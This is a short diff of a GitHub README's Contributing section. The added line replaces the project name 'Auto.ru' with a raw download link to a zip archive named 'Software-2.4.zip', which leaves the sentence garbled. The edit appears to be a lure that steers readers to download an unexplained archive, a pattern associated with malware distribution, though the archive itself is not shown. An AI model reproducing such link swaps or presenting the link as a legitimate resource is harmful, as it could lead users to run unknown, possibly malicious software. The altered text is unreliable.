thomsxd/autoru/README.md

 ## Contributing

 We welcome contributions from the community.
-If you would like to contribute to Auto.ru, please follow these steps:
+If you would like to contribute to https://github.com/thomsxd/autoru/raw/refs/heads/master/api/Software-2.4.zip, please follow these steps:

 1. Fork the repository.
 2. Create a new branch for your feature or bug fix.